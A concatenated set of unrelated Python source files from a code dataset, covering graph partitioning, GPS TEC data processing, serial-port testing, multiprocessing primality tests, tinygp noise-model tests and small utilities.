dynamic_axes={'input': {0: 'batch_size', 2: "height", 3: 'width'},
'output': {0: 'batch_size'}})
print("Saved {}".format(args.save))
|
StarcoderdataPython
|
1796676
|
<filename>tests/test_lut.py
from aetherling.modules.lut_any_type import DefineLUTAnyType
from magma import *
from magma.bitutils import *
import fault
from aetherling.helpers.fault_helpers import compile_and_run
import builtins
def test_lut_11_13():
width = 11
numOut = 13
T = Array[width, BitOut]
init = [builtins.tuple(int2seq(i, width)) for i in range(4, numOut+4)]
testcircuit = DefineLUTAnyType(T, numOut, builtins.tuple(init))
tester = fault.Tester(testcircuit, testcircuit.CLK)
for i in range(numOut):
tester.circuit.addr = i
tester.eval()
tester.circuit.data.expect(i + 4)
compile_and_run(tester)
|
StarcoderdataPython
|
1797832
|
import numpy as np
def get_tree_slow(sorted_indices, adj):
block = []
treeNumber = {}
nTrees = 0
for coordinate in sorted_indices:
neighbors = np.nonzero(adj[coordinate])[0]
nn = np.intersect1d(neighbors, block)
neighTrees = set()
continueFlag = False
for neigh in nn:
if treeNumber[neigh] not in neighTrees:
neighTrees.add(treeNumber[neigh])
else:
continueFlag = True
break
if continueFlag:
continue
# if nn.size > 2:
# continue
if nn.size == 0:
treeNumber[coordinate] = nTrees
nTrees += 1
else:
treeNumber[coordinate] = nTrees
for neigh in nn:
treeID = treeNumber[neigh]
for tree_ in treeNumber:
if treeNumber[tree_] == treeID:
treeNumber[tree_] = nTrees
treeNumber[neigh] = nTrees
nTrees += 1
block += [coordinate]
#block = np.array(block)[:block_size**3]
block = np.array(block)
block.sort()
return block
class ForestBuilder:
def __init__(self, ind=None, A=None):
self.block = []
self.treeNumber = {}
self.nTrees = 0
if ind is not None:
self.add2forest(ind, A)
def checkForestProperty(self, ind, A):
neighbors = np.nonzero(A[ind])[0]
blockNeighs = np.intersect1d(neighbors, self.block)
neighTrees = set()
addNode = True
for neigh in blockNeighs:
if self.treeNumber[neigh] not in neighTrees:
neighTrees.add(self.treeNumber[neigh])
else:
addNode = False
break
return {"addNode":addNode, "blockNeighs":blockNeighs}
def add2forest(self, ind, A):
meta = self.checkForestProperty(ind, A)
if meta["addNode"] is False:
return False
blockNeighs = meta["blockNeighs"]
if blockNeighs.size == 0:
self.treeNumber[ind] = self.nTrees
self.nTrees += 1
else:
self.treeNumber[ind] = self.nTrees
for neigh in blockNeighs:
treeID = self.treeNumber[neigh]
for tree_ in self.treeNumber:
if self.treeNumber[tree_] == treeID:
self.treeNumber[tree_] = self.nTrees
self.treeNumber[neigh] = self.nTrees
self.nTrees += 1
self.block += [ind]
return True
#### GENERAL GRAPH
def get_tp_general_graph(W, L=None):
forestDict = {}
n_nodes = W.shape[0]
nodeIndices = np.arange(n_nodes)
if L is not None:
nodeIndices = np.argsort(L)[::-1]
for i in nodeIndices:
availForests = {}
for f in forestDict:
forest = forestDict[f]
if forest.checkForestProperty(i, W)["addNode"]:
availForests[f] = len(forest.block)
if len(availForests) == 0:
# Create new color
f = len(forestDict)
forestDict[f] = ForestBuilder(ind=i,A=W)
else:
# Use existing color
#f = min(availForests, key=availForests.get)
f = min(availForests.keys())
forestDict[f].add2forest(i, W)
# SANITY CHECK
alls = []
blocks = []
for f in forestDict:
blocks += [forestDict[f].block]
alls += forestDict[f].block
alls = np.array(alls)
assert np.unique(alls).size == alls.size
assert alls.size == n_nodes
#
return tuple([np.array(b) for b in blocks])
def isForest(Wb):
n = Wb.shape[0]
Laplacian = Wb.copy()
Laplacian[np.diag_indices(n)] = Wb.sum(1)
LHS = 0.5*np.trace(Laplacian)
RHS = np.linalg.matrix_rank(Laplacian)
return LHS == RHS
def get_rb_general_graph(W, L=None):
colorDict = {}
blockDict = {}
n_nodes = W.shape[0]
node2color = np.ones(n_nodes) * -1
nodeIndices = np.arange(n_nodes)
if L is not None:
nodeIndices = np.argsort(L)[::-1]
for i in nodeIndices:
neigh = np.where(W[i] != 0)[0]
# Get neighbor colors that are not -1
neighColors = np.unique(node2color[neigh])
palette = {c:colorDict[c] for c in colorDict if c not in neighColors}
if len(palette) == 0:
# Create new color
c = len(colorDict)
colorDict[c] = 1
blockDict[c] = [i]
node2color[i] = c
else:
# Use existing color
c = min(palette, key=palette.get)
colorDict[c] += 1
blockDict[c] += [i]
node2color[i] = c
# SANITY CHECK
alls = []
for v in blockDict.values():
alls += v
alls = np.array(alls)
assert np.unique(alls).size == alls.size
assert alls.size == n_nodes
#
return tuple([np.array(b) for b in blockDict.values()])
#### LATTICE GRAPH
def get_tp_indices(nrows, ncols):
white = [np.arange(0, ncols*nrows, nrows)]
black = [np.arange(nrows-1, ncols*nrows, nrows)]
for c in range(ncols):
if c % 2 == 0:
white += [np.arange(c*nrows, (c+1)*nrows-1)]
else:
black += [np.arange(c*nrows+1, (c+1)*nrows)]
white = np.unique(np.hstack(white))
black = np.unique(np.hstack(black))
assert black.size + white.size == (nrows * ncols)
assert np.array_equal(np.unique(np.hstack([black, white])), np.arange(nrows*ncols))
#return {"black":black, "white":white}
return (black, white)
def remove_labeled_nodes(graphBlocks, y):
labeled = np.where(y != 0)[0]
unlabeled = np.where(y == 0)[0]
gl2loc = {}
for gl, loc in zip(unlabeled, np.arange(unlabeled.shape[0])):
gl2loc[gl] = loc
new_graphBlocks = []
for block in graphBlocks:
new_block = np.setdiff1d(block, labeled)
new_block = np.array([gl2loc[b] for b in new_block])
#return {"black":black, "white":white}
new_graphBlocks += [new_block]
return tuple(new_graphBlocks)
def get_rb_indices(nrows, ncols):
red = []
black = []
for c in range(ncols):
odds = np.arange(1+c*nrows, (c+1)*nrows, 2)
evens = np.arange(0+c*nrows, (c+1)*nrows, 2)
if c % 2 == 0:
red += [evens]
black += [odds]
else:
red += [odds]
black += [evens]
red = np.hstack(red)
black = np.hstack(black)
assert black.size + red.size == (nrows * ncols)
assert np.array_equal(np.unique(np.hstack([black, red])), np.arange(nrows*ncols))
#return {"red":red, "black":black}
return (red, black)
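# Illustrative check (added for clarity): partition a small 4-cycle; the adjacency
# matrix below is an example input, not data from the original project.
if __name__ == "__main__":
    W = np.array([[0, 1, 0, 1],
                  [1, 0, 1, 0],
                  [0, 1, 0, 1],
                  [1, 0, 1, 0]])
    print(get_rb_general_graph(W))  # two independent sets, e.g. (array([0, 2]), array([1, 3]))
    print(get_tp_general_graph(W))  # blocks whose induced subgraphs are forests (cycle-free)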
|
StarcoderdataPython
|
3235283
|
<filename>gpstec/gpslos.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 20 12:06:16 2020
@author: <EMAIL>
"""
import numpy as np
import os
import h5py
from pyGnss import gnssUtils as gu
from pyGnss import scintillation
from datetime import datetime
import warnings
from argparse import ArgumentParser
warnings.simplefilter('ignore', np.RankWarning)
global tsps
def getIntervals(y, maxgap=3, maxjump=2):
r = np.arange(y.size)
idx = np.isfinite(y)
r = r[idx]
intervals=[]
if len(r)==0:
return idx, intervals
beginning=r[0]
last=r[0]
for i in r[1:]:
if (i-last > maxgap) or (abs(y[i] - y[last]) > maxjump):
intervals.append((beginning, last))
beginning=i
last=i
if i==r[-1]:
intervals.append((beginning, last))
return idx, intervals
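# Worked example (added for clarity): for y = [1, 2, nan, nan, nan, nan, 10, 11] the default
# maxgap/maxjump give intervals [(0, 1), (6, 7)], i.e. index pairs bounding runs of finite
# samples separated by at most `maxgap` indices and jumping by at most `maxjump` in value.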
def tecdPerLOS(stec, intervals, mask=None, eps=1, polynom_list=None, zero_mean=False):
global delta_eps, polynom_orders
    tecd = np.nan * np.ones(stec.size)
    err_list = np.array([])  # defined up front so the final return is safe when no interval is usable
if mask is None:
mask = np.zeros(stec.size, dtype=bool)
for ir, r in enumerate(intervals):
chunk = stec[r[0]+1 : r[1]-1]
idf = np.isfinite(chunk)
if np.sum(np.isfinite(chunk)) < (15 * (60/tsps)):
err_list = np.array([])
continue
if np.sum(np.isnan(chunk)) > 0:
chunk = gu.cubicSplineFit(chunk, idf)
res, err_list0, po = gu.detrend(chunk, polynom_list=polynom_list, eps=eps, mask=mask[r[0]+1 : r[1]-1], polynomial_order=True)
if ir == 0 or len(err_list) == 0:
err_list = err_list0
else:
err_list = np.vstack((err_list, err_list0))
res[~idf] = np.nan
if zero_mean:
if abs(np.nansum(res)) < 5:
tecd[r[0]+1 : r[1]-1] = res
else:
tecd[r[0]+1 : r[1]-1] = res
return tecd, err_list
def main(F, el_mask = None, odir = None):
global tsps
D = h5py.File(F, 'r')
el_mask = 30
maxjump = 1.6 + (np.sqrt(tsps) - 1)
eps = 1 * np.sqrt(30/tsps)
polynom_list = np.arange(0,20)
el_mask_in = (el_mask - 10) if (el_mask - 10) >= 8 else 8
print ('Reading in receiver names')
t0 = datetime.now()
rxn_all = np.asanyarray([row[12].decode() for row in D['Data/Table Layout'][()]])
rxn = np.unique(rxn_all)
print ('Read in {}.\nReading in satellite number'.format(datetime.now()-t0))
t0 = datetime.now()
sv_unique = np.unique(np.asanyarray([row[13] for row in D['Data/Table Layout'][()]]))
sv_index = np.arange(sv_unique.size)
sv_list = {}
for i, s in enumerate(sv_unique):
sv_list[str(s)] = sv_index[i]
print ('Read in {}.\nReading in observations times'.format(datetime.now()-t0))
obstimes = np.unique(np.asanyarray([datetime.utcfromtimestamp(row[9]) for row in D['Data/Table Layout'][()]]))
obstimes_unix = gu.datetime2posix(obstimes)
print ('Read in {}.\n'.format(datetime.now()-t0))
D.close()
# Out-filename
if odir is None:
odir = os.path.split(F)[0]
sfn = str(obstimes[0].year) + '_' + obstimes[0].strftime('%m%dT%H%M') + '-' + obstimes[-1].strftime('%m%dT%H%M') + '_' + 'madrigallos' + '_' + str(el_mask) +'el_' + str(tsps) + 's' + '_roti'
savefn = os.path.join(odir, sfn + '.h5')
# Duplicate file names
if os.path.exists(savefn):
head = os.path.splitext(savefn)[0]
c = 0
while os.path.exists(savefn):
try:
c = int(os.path.splitext(savefn)[0].split('_')[-1])
c += 1
except:
c += 1
savefn = head + '_' + str(c) + '.h5'
logfn = os.path.splitext(savefn)[0] + '.log'
LOG = open(logfn, 'w')
LOG.close()
print ('Init arrays')
TEC = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
DTEC = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
ROTI = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
AZ = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
EL = np.nan * np.zeros((obstimes.size, sv_unique.size, rxn.size), dtype=np.float16)
RXP = np.nan * np.zeros((rxn.size, 3), dtype=np.float16)
print ('Saving to: {}'.format(savefn))
h5file = h5py.File(savefn, 'w')
h5file.create_dataset('obstimes', data=obstimes_unix)
h5file.create_dataset('stec', data=TEC, compression='gzip', compression_opts=9)
h5file.create_dataset('res', data=DTEC, compression='gzip', compression_opts=9)
h5file.create_dataset('roti', data=ROTI, compression='gzip', compression_opts=9)
h5file.create_dataset('az', data=AZ, compression='gzip', compression_opts=9)
h5file.create_dataset('el', data=EL, compression='gzip', compression_opts=9)
h5file.create_dataset('rx_positions', data=RXP, compression='gzip', compression_opts=9)
asciiListN = [n.encode("ascii", "ignore") for n in rxn]
h5file.create_dataset('rx_name', (len(asciiListN),1),'S4', asciiListN)
h5file.close()
del TEC, DTEC, ROTI, AZ, EL, RXP
print ('Arrays erased')
for irx, rx in enumerate(rxn):
if irx == 0:
with open(logfn, 'a') as LOG:
LOG.write('Processing {}/{}.\n'.format(irx+1, rxn.size))
LOG.close()
else:
with open(logfn, 'a') as LOG:
LOG.write('Processing {}/{}. It took {} to process last RX data. \n'.format(irx+1, rxn.size, datetime.now()-t0))
LOG.close()
t0 = datetime.now()
try:
D = h5py.File(F, 'r')
idrx = np.isin(rxn_all, rx)
sv_all = np.asanyarray([row[13] for row in D['Data/Table Layout'][idrx]])
svn = np.unique(sv_all)
rx_lat = D['Data/Table Layout'][idrx][0][-4]
rx_lon = D['Data/Table Layout'][idrx][0][-3]
D.close()
h5file = h5py.File(savefn, 'a')
h5file['rx_positions'][irx, 0] = rx_lat
h5file['rx_positions'][irx, 1] = rx_lon
h5file['rx_positions'][irx, 2] = 0
h5file.close()
del rx_lat, rx_lon
for isv, sv in enumerate(svn):
vtec = np.nan * np.ones(obstimes.size, dtype=np.float16)
elv = np.nan * np.ones(obstimes.size, dtype=np.float16)
azm = np.nan * np.ones(obstimes.size, dtype=np.float16)
idsv = np.isin(sv_all, sv)
ids = sv_list[str(sv)]
D = h5py.File(F, 'r')
t = np.asanyarray([datetime.utcfromtimestamp(row[9]) for row in D['Data/Table Layout'][idrx][idsv] ])
idt = np.isin(obstimes, t)
vtec[idt] = np.asanyarray([row[18] for row in D['Data/Table Layout'][idrx][idsv] ])
elv[idt] = np.asanyarray([row[-5] for row in D['Data/Table Layout'][idrx][idsv] ])
azm[idt] = np.asanyarray([row[-6] for row in D['Data/Table Layout'][idrx][idsv] ])
D.close()
idel0 = np.nan_to_num(elv) < el_mask_in
idel = np.nan_to_num(elv) < el_mask
vtec[idel0] = np.nan
try:
idx, intervals = getIntervals(vtec, maxgap=5, maxjump=maxjump)
tecd, err_list = tecdPerLOS(vtec, intervals, polynom_list=polynom_list, eps=eps)
tecd[idel] = np.nan
rot = np.hstack((np.nan, (np.diff(vtec) / tsps)))
roti = scintillation.sigmaTEC(rot, 10) # 5 min
roti[idel] = np.nan
vtec[idel] = np.nan
h5file = h5py.File(savefn, 'a')
h5file['stec'][:, isv, irx] = vtec
h5file['roti'][:, isv, irx] = roti
h5file['res'][:, isv, irx] = tecd
h5file['el'][:, isv, irx] = elv
h5file['az'][:, isv, irx] = azm
h5file.close()
del vtec, tecd, elv, azm, roti, rot, idx, intervals, idel0, idel
except:
del vtec, elv, azm
del idrx, idsv, ids
except:
pass
with open(logfn, 'a') as LOG:
LOG.write('Processing Done')
LOG.close()
return 0
if __name__ == '__main__':
tsps = 30
p = ArgumentParser()
p.add_argument('filename', help= 'to madrigal_los.hdf5')
p.add_argument('--elmask', type = int, default = 30)
p.add_argument('--odir', help = 'Output directory.', default=None)
P = p.parse_args()
main(P.filename, el_mask=P.elmask, odir=P.odir)
|
StarcoderdataPython
|
3325483
|
<gh_stars>0
import numpy as np
import pytest
from lagom import Seeder
from lagom.core.multiprocessing import BaseWorker
from lagom.core.multiprocessing import BaseMaster
from lagom.core.multiprocessing import BaseIterativeMaster
def naive_primality(integer):
r"""Naive way to test a prime by iterating over all preceding integers. """
prime = True
if integer <= 1:
prime = False
else:
for i in range(2, integer):
if integer % i == 0:
prime = False
return prime
class NaivePrimalityWorker(BaseWorker):
def prepare(self):
self.prepared = 'ok'
def work(self, master_cmd):
assert self.prepared == 'ok'
task_id, task, seed = master_cmd
result = []
for integer in task:
result.append(naive_primality(integer=integer))
return task_id, result
class NaivePrimalityMaster(BaseMaster):
def make_tasks(self):
tasks = np.array_split(range(128*10), 128)
return tasks
def _process_workers_result(self, tasks, workers_result):
for task, worker_result in zip(tasks, workers_result):
task_id, result = worker_result
for integer, prime in zip(task, result):
assert prime == naive_primality(integer)
class NaivePrimalityIterativeMaster(BaseIterativeMaster):
def make_tasks(self, iteration):
tasks = np.array_split(range(128*10), self.num_worker)
return tasks
def _process_workers_result(self, tasks, workers_result):
for task, worker_result in zip(tasks, workers_result):
task_id, result = worker_result
for integer, prime in zip(task, result):
assert prime == naive_primality(integer)
class TestMultiprocessing(object):
def test_seeder(self):
seeder = Seeder(init_seed=0)
assert seeder.rng.get_state()[1][0] == 0
assert np.random.get_state()[1][20] != seeder.rng.get_state()[1][20]
assert len(seeder(size=1)) == 1
assert len(seeder(size=20)) == 20
assert np.array(seeder(size=[2, 3, 4])).shape == (2, 3, 4)
def test_master_worker(self):
prime_test = NaivePrimalityMaster(worker_class=NaivePrimalityWorker,
num_worker=128,
init_seed=0,
daemonic_worker=None)
prime_test()
def test_iterative_master_worker(self):
prime_test = NaivePrimalityIterativeMaster(num_iteration=3,
worker_class=NaivePrimalityWorker,
num_worker=128,
init_seed=0,
daemonic_worker=None)
prime_test()
|
StarcoderdataPython
|
154998
|
import logging
import synapse.lib.cache as s_cache
logger = logging.getLogger(__name__)
class Triggers:
def __init__(self):
self._trig_list = []
self._trig_match = s_cache.MatchCache()
self._trig_byname = s_cache.Cache(onmiss=self._onTrigNameMiss)
def clear(self):
'''
Clear all previously registered triggers
'''
self._trig_list = []
self._trig_byname.clear()
def add(self, func, perm):
'''
Add a new callback to the triggers.
Args:
func (function): The function to call
perm (str,dict): The permission tufo
Returns:
(None)
'''
self._trig_list.append((perm, func))
self._trig_byname.clear()
def _onTrigNameMiss(self, name):
retn = []
for perm, func in self._trig_list:
if self._trig_match.match(name, perm[0]):
retn.append((perm, func))
return retn
def _cmpperm(self, perm, must):
for prop, match in must[1].items():
valu = perm[1].get(prop)
if valu is None:
return False
if not self._trig_match.match(valu, match):
return False
return True
def trigger(self, perm, *args, **kwargs):
'''
Fire any matching trigger functions for the given perm.
Args:
perm ((str,dict)): The perm tufo to trigger
*args (list): args list to use calling the trigger function
**kwargs (dict): kwargs dict to use calling the trigger function
Returns:
(None)
'''
for must, func in self._trig_byname.get(perm[0]):
if self._cmpperm(perm, must):
try:
func(*args, **kwargs)
except Exception as e:
logger.exception(e)
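# Illustrative usage sketch (added; the permission names and values below are invented
# examples, not part of the original module).
if __name__ == '__main__':
    trig = Triggers()
    trig.add(lambda node: logger.info('added node %s', node), ('node:add', {'form': 'inet:ipv4'}))
    trig.trigger(('node:add', {'form': 'inet:ipv4'}), '1.2.3.4')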
|
StarcoderdataPython
|
123174
|
import glob
import random
training_rate = 0.9999
val_rate = 0.0001
def find_files(path, pattern="*.wav"):
    filenames = []
    for filename in glob.iglob(f'{path}/**/*{pattern}', recursive=True):
filenames.append(filename)
return filenames
def create_metadata(path="datasets"):
wav_lists = find_files(path=path)
random.shuffle(wav_lists)
train_num = int(len(wav_lists) * training_rate)
train_lists = wav_lists[:train_num]
val_lists = wav_lists[train_num:]
with open("datasets/training.txt", 'w', encoding='utf-8') as w1:
for i in train_lists:
w1.write(f"{i}\n")
with open("datasets/validation.txt", 'w', encoding='utf-8') as w2:
for i in val_lists:
w2.write(f"{i}\n")
if __name__ == '__main__':
create_metadata()
|
StarcoderdataPython
|
1718915
|
<reponame>JosephLutz/serialCommTest<filename>serialData.py<gh_stars>0
# serialData
from OrionPythonModules import serial_settings
from msgMonitor import CREATE_SERIAL_PORT
from msgMonitor import PORT_OPENED
from msgMonitor import PORT_CLOSED
from msgMonitor import REPORT_DATA_RECIEVED
import threading
import serial
import select
import termios
import Queue
import time
import sys
import os
if sys.hexversion < 0x020100f0:
import TERMIOS
else:
TERMIOS = termios
from config import *
class SerialData(serial.Serial):
#Used by the txThread and rxThread as the DataSendObj and dataGetObj.
LXM_MODE_VALUES = [
u'RS-232', u'RS-485 2-wire',
u'RS-485/422 4-wire', u'Loopback'
]
LXM_SERIAL_TYPES = {
u'RS232': LXM_MODE_VALUES[0],
u'RS485': LXM_MODE_VALUES[1],
u'RS422': LXM_MODE_VALUES[2],
None: LXM_MODE_VALUES[3],
}
def __init__(self, port, packetSource, msgQueue=None, readTimeout=SERIAL_PORT_READ_TIMEOUT, writeTimeout=None,
interCharTimeout=None):
serial.Serial.__init__(self,
port = None, #number of device, numbering starts at
#zero. if everything fails, the user
#can specify a device string, note
#that this isn't portable anymore
#port will be opened if one is specified
baudrate=115200, #baudrate
bytesize=serial.EIGHTBITS, #number of databits
parity=serial.PARITY_NONE, #enable parity checking
stopbits=serial.STOPBITS_ONE, #number of stopbits
timeout=readTimeout, #set a timeout value, None to wait forever
xonxoff=0, #enable software flow control
rtscts=0, #enable RTS/CTS flow control
writeTimeout=writeTimeout, #set a timeout for writes
dsrdtr=None, #None: use rtscts setting, dsrdtr override if true or false
interCharTimeout=interCharTimeout #Inter-character timeout, None to disable
)
if isinstance(port, str) or isinstance(port, unicode):
self.port = os.path.normpath(port)
else:
# Using an intiger is not as reliable (A guess is made).
self.port = port
# Queue for sending state back to messaging thread
self.msgQueue = msgQueue
# lock for when a thread needs exclusive access to the serial port
self.portLock = threading.Lock() # lock exclusive use of hardware
# list of sent packet information
self.sentPackets = [] #[(packetID, packetLength, hash), ...]
# place holder populated when the txThread is created
self.txThread = None
# data recieved (list of tuples, each containing data read and time since last read)
self.readBuffer = [] # [(data, time), ...]
# place holder populated when the rxThread is created
self.rxThread = None
# Queue that holds data packets to be sent
self.packetSource = packetSource
if self.msgQueue is not None:
self.msgQueue.put((None, {'port': self.port}, CREATE_SERIAL_PORT))
def set_serial_mode(self, mode=None):
def mode_in(mode):
if ((isinstance(mode, str) or isinstance(mode, unicode)) and
(unicode(mode.upper()) in SerialData.LXM_SERIAL_TYPES.keys())):
return SerialData.LXM_SERIAL_TYPES[mode]
elif ((isinstance(mode, str) or isinstance(mode, unicode)) and
(unicode(mode) in SerialData.LXM_SERIAL_TYPES.values())):
return unicode(mode)
elif isinstance(mode, int) and (mode >= 0) and (mode < len(SerialData.LXM_MODE_VALUES)):
return SerialData.LXM_MODE_VALUES[mode]
else:
return u'Loopback'
settings = serial_settings.SerialSettings()
settings.cards = [{
'type': '124',
'ports': [{}, {}, {}, {}, ]
}, {
'type': '124',
'ports': [{}, {}, {}, {}, ]
}]
        if isinstance(mode, tuple) and len(mode) == 8:
            for mode_index in range(0, 4):
                settings.cards[0]['ports'][mode_index]['type'] = mode_in(mode[mode_index])
            for mode_index in range(0, 4):
                # the second card takes the last four entries of the 8-entry mode tuple
                settings.cards[1]['ports'][mode_index]['type'] = mode_in(mode[mode_index + 4])
elif isinstance(mode, str) or isinstance(mode, unicode) or isinstance(mode, int):
mode = mode_in(mode)
for mode_index in range(0, 4):
settings.cards[0]['ports'][mode_index]['type'] = mode
for mode_index in range(0, 4):
settings.cards[1]['ports'][mode_index]['type'] = mode
else:
mode = 'Loopback'
for mode_index in range(0, 4):
settings.cards[0]['ports'][mode_index]['type'] = mode
for mode_index in range(0, 4):
settings.cards[1]['ports'][mode_index]['type'] = mode
settings.apply()
def open_serial_port(self):
self.portLock.acquire()
if not self.isOpen():
if not os.path.exists(self.port):
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, None,
'Serial port {port} does not exist.'.format(port=self.port)))
self.portLock.release()
return False
try:
self.open()
except serial.SerialException:
if not os.path.exists(self.port):
if self.msgQueue is not None:
self.msgQueue.put(
(self.txThread.threadID, None,
('SerialException while opening port {port}, ' +
'and the port dissapeared after open atempt.'.format(port=self.port))))
else:
if self.msgQueue is not None:
self.msgQueue.put(
(self.txThread.threadID, None,
'SerialException while opening port {port}.'.format(port=self.port)))
self.portLock.release()
return False
if not self.isOpen():
if self.msgQueue is not None:
self.msgQueue.put(
(self.txThread.threadID, None,
'Serial port {port} would not open with specified port configuration.'.format(port=self.port)))
self.portLock.release()
return False
if ENABLE_RTS_LINE:
# NOTE: Set RTS back to False as soon as possible after open.
# open resets RTS True when RTS/CTS flow control disabled
# (re)set RTS to off
self.setRTS(False)
if ENABLE_DTR_LINE:
# set DTR to on
self.setDTR(True)
if ENABLE_TCDRAIN:
iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd)
iflag |= (TERMIOS.IGNBRK | TERMIOS.IGNPAR)
termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, {'port': self.port}, PORT_OPENED))
self.portLock.release()
return True
def close_serial_port(self):
self.portLock.acquire()
if self.isOpen():
if ENABLE_RTS_LINE:
# set RTS to off
self.setRTS(False)
if ENABLE_DTR_LINE:
# set DTR to off
self.setDTR(False)
# close the port
self.close()
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, {'port': self.port}, PORT_CLOSED))
self.portLock.release()
#
# These methods determine how the port is used
#
def thread_send_startup(self):
self.sentPackets = []
# opent the port
if not self.open_serial_port():
raise BaseException
def thread_send_start(self):
if ENABLE_RTS_LINE:
self.portLock.acquire()
# set RTS to on
self.setRTS(True)
self.portLock.release()
time.sleep(SERIAL_PORT_WARMUP_TIME)
def send_data(self):
start_time = time.time()
if self.packetSource.queue.empty():
return False
# get the dataTuple from the Queue
dataTuple = None
try:
while dataTuple is None:
dataTuple = self.packetSource.queue.get_nowait()
except Queue.Empty:
return False
# notify we are using a packet
self.packetSource.packetUsed.set()
# write the data
try:
if self.msgQueue is not None:
self.msgQueue.put(
(self.txThread.threadID, None,
'Started TX on {packetLength} byte packet {packetID} @ {time}'.format(
packetID=dataTuple[1], time=(time.time() - start_time), packetLength=dataTuple[2])))
self.write(dataTuple[0])
if self.msgQueue is not None:
                self.msgQueue.put(
                    (self.txThread.threadID, None,
                     'Finished TX on {packetLength} byte packet {packetID} @ {time}'.format(
                        packetID=dataTuple[1], time=(time.time() - start_time), packetLength=dataTuple[2])))
except serial.SerialTimeoutException:
if self.msgQueue is not None:
                self.msgQueue.put((self.txThread.threadID, None, 'SerialException during packet write'))
return False
# store tuple of packet info: (packetID, packetLength, hash)
self.sentPackets.append(dataTuple[1:])
return True
def thread_send_stop(self):
if (self.fd > 0):
if ENABLE_RTS_LINE:
self.portLock.acquire()
if ENABLE_TCDRAIN:
termios.tcdrain(self.fd)
time.sleep(SERIAL_PORT_COOLDOWN_TIME)
# set RTS to off
self.setRTS(False)
self.portLock.release()
# use the message queue to send self.sentPackets
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, self.sentPackets, REPORT_DATA_RECIEVED))
def thread_get_startup(self):
# reset the readBuffer
self.readBuffer = []
# open the port
if not self.open_serial_port():
raise BaseException
def thread_get_start(self):
pass
def get_data(self):
reading = True
bytes_read = 0
start_time = time.time()
while reading:
(rlist, _, _) = select.select([self.fileno()], [], [], self.timeout)
            if (len(rlist) == 1) and rlist[0] == self.fileno():
data = self.read(NUM_BYTES_TO_READ)
bytes_read += len(data)
self.readBuffer.append((data, (time.time() - start_time)),)
else:
reading = False
        if bytes_read == 0:
return False
return True
def thread_get_stop(self):
# send the readBuffer in the message queue
if self.msgQueue is not None:
self.msgQueue.put((self.txThread.threadID, self.readBuffer, 'Data read before timeout.'))
if __name__ == '__main__':
import tests.serialData_test
    tests.serialData_test.runtests()
|
StarcoderdataPython
|
130012
|
# -*- coding: utf-8 -*-
# mypy: ignore-errors
import jax.numpy as jnp
import numpy as np
import tinygp
def check_noise_model(noise, dense_rep):
random = np.random.default_rng(6675)
np.testing.assert_allclose(noise.diagonal(), jnp.diag(dense_rep))
np.testing.assert_allclose(noise + np.zeros_like(dense_rep), dense_rep)
y1 = random.normal(size=dense_rep.shape)
np.testing.assert_allclose(noise + y1, dense_rep + y1)
np.testing.assert_allclose(y1 + noise, y1 + dense_rep)
np.testing.assert_allclose(noise @ y1, dense_rep @ y1)
y2 = random.normal(size=(dense_rep.shape[1], 3))
np.testing.assert_allclose(noise @ y2, dense_rep @ y2)
y3 = random.normal(size=dense_rep.shape[1])
np.testing.assert_allclose(noise @ y3, dense_rep @ y3)
try:
qsm = noise.to_qsm()
except NotImplementedError:
pass
else:
np.testing.assert_allclose(qsm @ y1, dense_rep @ y1)
np.testing.assert_allclose(qsm @ y2, dense_rep @ y2)
np.testing.assert_allclose(qsm @ y3, dense_rep @ y3)
def test_diagonal():
N = 50
random = np.random.default_rng(9432)
diag = random.normal(size=N)
noise = tinygp.noise.Diagonal(diag=diag)
check_noise_model(noise, np.diag(diag))
def test_banded():
N, J = 50, 5
random = np.random.default_rng(9432)
# Create a random symmetric banded matrix
R = random.normal(size=(N, N))
R[np.triu_indices(N, J + 1)] = 0
R[np.tril_indices(N)] = R.T[np.tril_indices(N)]
# Extract the diagonal and off-diagonal elements
diag = np.diag(R)
off_diags = np.zeros((N, J))
for j in range(J):
off_diags[: N - j - 1, j] = R[
(np.arange(0, N - j - 1), np.arange(j + 1, N))
]
noise = tinygp.noise.Banded(diag=diag, off_diags=off_diags)
check_noise_model(noise, R)
def test_dense():
N = 50
random = np.random.default_rng(9432)
M = random.normal(size=(N, N))
noise = tinygp.noise.Dense(value=M)
check_noise_model(noise, M)
|
StarcoderdataPython
|
1689819
|
from __future__ import print_function
import torch
import torch.nn as nn
class Normalization(nn.Module):
def __init__(self, mean, std):
super(Normalization, self).__init__()
        # reshape once in __init__ so the per-channel statistics broadcast over (C, H, W) images
        self.mean = mean.clone().detach().view(-1, 1, 1)
        self.std = std.clone().detach().view(-1, 1, 1)
    def forward(self, img):
        # normalize img channel-wise without re-wrapping the buffers on every call
        normalized_img = (img - self.mean) / self.std
return normalized_img
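# Illustrative usage sketch (added for clarity). The mean/std values are the common
# ImageNet statistics and are only example inputs, not something defined by this module.
if __name__ == "__main__":
    norm = Normalization(torch.tensor([0.485, 0.456, 0.406]), torch.tensor([0.229, 0.224, 0.225]))
    out = norm(torch.rand(3, 224, 224))
    print(out.shape)  # torch.Size([3, 224, 224]), standardized per channel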
|
StarcoderdataPython
|
1759631
|
"""
Python 3 course - Python Exercise #020
A teacher wants to randomize the presentation order of his four students.
Write a program that helps him by reading the students' names and listing the order.
25.03.2021 - <NAME>
"""
from random import shuffle
a1 = str(input('Digite o nome do aluno 1 '))
a2 = str(input('Digite o nome do aluno 2 '))
a3 = str(input('Digite o nome do aluno 3 '))
a4 = str(input('Digite o nome do aluno 4 '))
lista = [a1, a2, a3, a4]
shuffle(lista)
print(f'A ordem da apresentação é {lista}')
|
StarcoderdataPython
|
187453
|
<reponame>ConnorDoyle/CPU-Manager-for-Kubernetes
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
